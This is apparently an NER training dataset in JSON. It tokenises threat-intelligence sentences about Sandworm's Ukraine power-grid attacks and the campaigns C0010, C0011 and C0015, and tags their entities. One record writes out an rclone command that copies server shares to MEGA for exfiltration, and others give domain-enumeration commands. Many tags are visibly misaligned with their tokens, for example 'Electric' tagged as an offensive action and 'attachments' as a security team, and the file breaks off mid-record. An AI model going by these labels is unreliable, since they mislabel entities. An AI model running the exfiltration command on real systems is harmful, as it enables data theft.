[ { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "modified", "in-registry", "internet", "settings", "to", "lower", "internet", "security." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "created", "privileged", "domain", "accounts", "to", "be", "used", "for", "further", "exploitation", "and", "lateral", "movement." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "installed", "a", "modified", "Dropbear", "SSH", "client", "as", "the", "backdoor", "to", "target", "systems." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "vba_macro.exe", "deletes", "itself", "after", "`FONTCACHE.DAT`,", "`rundll32.exe`,", "and", "the", "associated", ".lnk", "file", "is", "delivered." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "B-OffAct", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "pushed", "additional", "malicious", "tools", "onto", "an", "infected", "system", "to", "steal", "user", "credentials,", "move", "laterally,", "and", "destroy", "data." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "gathered", "account", "credentials", "via", "a", "BlackEnergy", "keylogger", "plugin." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "moved", "their", "tools", "laterally", "within", "the", "corporate", "network", "and", "between", "the", "ICS", "and", "corporate", "network." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "leveraged", "Microsoft", "Office", "attachments", "which", "contained", "malicious", "macros", "that", "were", "automatically", "executed", "once", "the", "user", "permitted", "them." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "modified", "in-registry", "Internet", "settings", "to", "lower", "internet", "security", "before", "launching", "`rundll32.exe`,", "which", "in-turn", "launches", "the", "malware", "and", "communicates", "with", "C2", "servers", "over", "the", "Internet.", "." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "BlackEnergy’s", "network", "sniffer", "module", "to", "discover", "user", "credentials", "being", "sent", "over", "the", "network", "between", "the", "local", "LAN", "and", "the", "power", "grid’s", "industrial", "control", "systems." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "loaded", "BlackEnergy", "into", "svchost.exe,", "which", "then", "launched", "iexplore.exe", "for", "their", "C2." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "remotely", "discovered", "systems", "over", "LAN", "connections.", "OT", "systems", "were", "visible", "from", "the", "IT", "network", "as", "well,", "giving", "adversaries", "the", "ability", "to", "discover", "operational", "assets." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "B-OffAct", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "a", "backdoor", "which", "could", "execute", "a", "supplied", "DLL", "using", "`rundll32.exe`." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "obtained", "their", "initial", "foothold", "into", "many", "IT", "systems", "using", "Microsoft", "Office", "attachments", "delivered", "through", "phishing", "emails." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "I-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "valid", "accounts", "on", "the", "corporate", "network", "to", "escalate", "privileges,", "move", "laterally,", "and", "establish", "persistence", "within", "the", "corporate", "network." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "installed", "a", "VBA", "script", "called", "`vba_macro.exe`.", "This", "macro", "dropped", "`FONTCACHE.DAT`,", "the", "primary", "BlackEnergy", "implant;", "`rundll32.exe`,", "for", "executing", "the", "malware;", "`NTUSER.log`,", "an", "empty", "file;", "and", "desktop.ini,", "the", "default", "file", "used", "to", "determine", "folder", "displays", "on", "Windows", "machines." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2015", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "BlackEnergy", "to", "communicate", "between", "compromised", "hosts", "and", "their", "command-and-control", "servers", "via", "HTTP", "post", "requests." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "the", "`sp_addlinkedsrvlogin`", "command", "in", "MS-SQL", "to", "create", "a", "link", "between", "a", "created", "account", "and", "other", "servers", "in", "the", "network." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "B-Purp", "B-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "a", "script", "to", "attempt", "RPC", "authentication", "against", "a", "number", "of", "hosts." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "a", "trojanized", "version", "of", "Windows", "Notepad", "to", "add", "a", "layer", "of", "persistence", "for", "Industroyer." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "added", "a", "login", "to", "a", "SQL", "Server", "with", "`sp_addlinkedsrvlogin`." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "disabled", "event", "logging", "on", "compromised", "systems." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "created", "two", "new", "accounts,", "“admin”", "and", "“система”", "(System).", "The", "accounts", "were", "then", "assigned", "to", "a", "domain", "matching", "local", "operation", "and", "were", "delegated", "new", "privileges." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "B-OffAct", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "Mimikatz", "to", "capture", "and", "use", "legitimate", "credentials." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "`move`", "to", "transfer", "files", "to", "a", "network", "share." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "masqueraded", "executables", "as", "`.txt`", "files." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "DLLs", "and", "EXEs", "with", "filenames", "associated", "with", "common", "electric", "power", "sector", "protocols", "were", "used", "to", "masquerade", "files." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "heavily", "obfuscated", "code", "with", "Industroyer", "in", "its", "Windows", "Notepad", "backdoor." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "PowerShell", "scripts", "to", "run", "a", "credential", "harvesting", "tool", "in", "memory", "to", "evade", "defenses." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "checked", "for", "connectivity", "to", "resources", "within", "the", "network", "and", "used", "LDAP", "to", "query", "Active", "Directory,", "discovering", "information", "about", "computers", "listed", "in", "AD." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "utilized", "`net", "use`", "to", "connect", "to", "network", "shares." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "various", "MS-SQL", "stored", "procedures." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "UPX", "to", "pack", "a", "copy", "of", "Mimikatz." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "created", "VBScripts", "to", "run", "on", "an", "SSH", "server." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "the", "`xp_cmdshell`", "command", "in", "MS-SQL." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "B-Way" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "WMI", "in", "scripts", "were", "used", "for", "remote", "execution", "and", "system", "surveys." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2016", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "an", "arbitrary", "system", "service", "to", "load", "at", "system", "boot", "for", "persistence", "for", "Industroyer.", "They", "also", "replaced", "the", "ImagePath", "registry", "value", "of", "a", "Windows", "service", "with", "a", "new", "backdoor", "binary." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "deployed", "CaddyWiper", "on", "the", "victim’s", "IT", "environment", "systems", "to", "wipe", "files", "related", "to", "the", "OT", "capabilities,", "along", "with", "mapped", "drives,", "and", "physical", "drive", "partitions." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "leveraged", "Group", "Policy", "Objects", "(GPOs)", "to", "deploy", "and", "execute", "malware." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "used", "a", "Group", "Policy", "Object", "(GPO)", "to", "copy", "CaddyWiper's", "executable", "`msserver.exe`", "from", "a", "staging", "server", "to", "a", "local", "hard", "drive", "before", "deployment." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "leveraged", "Systemd", "service", "units", "to", "masquerade", "GOGETTER", "malware", "as", "legitimate", "or", "seemingly", "legitimate", "services." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "proxied", "C2", "communications", "within", "a", "TLS-based", "tunnel." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "utilized", "a", "PowerShell", "utility", "called", "TANKTRAP", "to", "spread", "and", "launch", "a", "wiper", "using", "Windows", "Group", "Policy." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "deployed", "the", "GOGETTER", "tunneler", "software", "to", "establish", "a", "“Yamux”", "TLS-based", "C2", "channel", "with", "an", "external", "server(s)." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "O", "B-OffAct", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "leveraged", "Scheduled", "Tasks", "through", "a", "Group", "Policy", "Object", "(GPO)", "to", "execute", "CaddyWiper", "at", "a", "predetermined", "time." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "configured", "Systemd", "to", "maintain", "persistence", "of", "GOGETTER,", "specifying", "the", "`WantedBy=multi-user.target`", "configuration", "to", "run", "GOGETTER", "when", "the", "system", "begins", "accepting", "user", "logins." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "O", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "2022", "Ukraine", "Electric", "Power", "Attack,", "Sandworm", "Team", "deployed", "the", "Neo-REGEORG", "webshell", "on", "an", "internet-facing", "server." ], "ner_tags": [ "O", "O", "B-Time", "B-Area", "I-OffAct", "I-OffAct", "O", "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0010,", "UNC3890", "actors", "established", "domains", "that", "appeared", "to", "be", "legitimate", "services", "and", "entities,", "such", "as", "LinkedIn,", "Facebook,", "Office", "365,", "and", "Pfizer." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Org", "I-Org", "O", "O", "B-Org" ] }, { "tokens": [ "During", "C0010,", "UNC3890", "actors", "likely", "compromised", "the", "domain", "of", "a", "legitimate", "Israeli", "shipping", "company." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "I-Org", "O" ] }, { "tokens": [ "During", "C0010,", "UNC3890", "actors", "likely", "established", "a", "watering", "hole", "that", "was", "hosted", "on", "a", "login", "page", "of", "a", "legitimate", "Israeli", "shipping", "company", "that", "was", "active", "until", "at", "least", "November", "2021." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "I-Time", "O" ] }, { "tokens": [ "For", "C0010,", "the", "threat", "actors", "compromised", "the", "login", "page", "of", "a", "legitimate", "Israeli", "shipping", "company", "and", "likely", "established", "a", "watering", "hole", "that", "collected", "visitor", "information." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "I-Org", "I-Org", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0010,", "UNC3890", "actors", "downloaded", "tools", "and", "malware", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0010,", "UNC3890", "actors", "used", "unique", "malware,", "including", "SUGARUSH", "and", "SUGARDUMP." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "For", "C0010,", "UNC3890", "actors", "obtained", "multiple", "publicly-available", "tools,", "including", "METASPLOIT,", "UNICORN,", "and", "NorthStar", "C2." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "For", "C0010,", "UNC3890", "actors", "staged", "malware", "on", "their", "infrastructure", "for", "direct", "download", "onto", "a", "compromised", "system." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0010,", "UNC3890", "actors", "staged", "tools", "on", "their", "infrastructure", "to", "download", "directly", "onto", "a", "compromised", "system." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0011,", "Transparent", "Tribe", "established", "SSL", "certificates", "on", "the", "typo-squatted", "domains", "the", "group", "registered." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0011,", "Transparent", "Tribe", "registered", "domains", "likely", "designed", "to", "appear", "relevant", "to", "student", "targets", "in", "India." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0011,", "Transparent", "Tribe", "relied", "on", "a", "student", "target", "to", "open", "a", "malicious", "document", "delivered", "via", "email." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "C0011,", "Transparent", "Tribe", "relied", "on", "student", "targets", "to", "click", "on", "a", "malicious", "link", "sent", "via", "email." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "C0011,", "Transparent", "Tribe", "sent", "malicious", "attachments", "via", "email", "to", "student", "targets", "in", "India." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0011,", "Transparent", "Tribe", "sent", "emails", "containing", "a", "malicious", "link", "to", "student", "targets", "in", "India." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0011,", "Transparent", "Tribe", "hosted", "malicious", "documents", "on", "domains", "registered", "by", "the", "group." ], "ner_tags": [ "O", "B-Idus", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0011,", "Transparent", "Tribe", "used", "malicious", "VBA", "macros", "within", "a", "lure", "document", "as", "part", "of", "the", "Crimson", "malware", "installation", "process", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0015,", "the", "threat", "actors", "used", "DLL", "files", "that", "had", "invalid", "certificates." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "Conti", "ransomware", "to", "encrypt", "a", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "limited", "Rclone's", "bandwidth", "setting", "during", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "obtained", "files", "and", "data", "from", "the", "compromised", "network." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "collected", "files", "from", "network", "shared", "drives", "prior", "to", "network", "encryption." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "use", "the", "command", "`net", "group", "\"domain", "admins\"", "/dom`", "to", "enumerate", "domain", "groups." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "the", "command", "`nltest", "/domain_trusts", "/all_trusts`", "to", "enumerate", "domain", "trusts." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "a", "DLL", "named", "`D8B3.dll`", "that", "was", "injected", "into", "the", "Winlogon", "process." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "exfiltrated", "files", "and", "sensitive", "data", "to", "the", "MEGA", "cloud", "storage", "site", "using", "the", "Rclone", "command", "`rclone.exe", "copy", "--max-age", "2y", "\"\\\\SERVER\\Shares\"", "Mega:DATA", "-q", "--ignore-existing", "--auto-confirm", "--multi-thread-streams", "7", "--transfers", "7", "--bwlimit", "10M`." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "conducted", "a", "file", "listing", "discovery", "against", "multiple", "hosts", "to", "ensure", "locker", "encryption", "was", "successful." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "downloaded", "additional", "tools", "and", "files", "onto", "a", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", 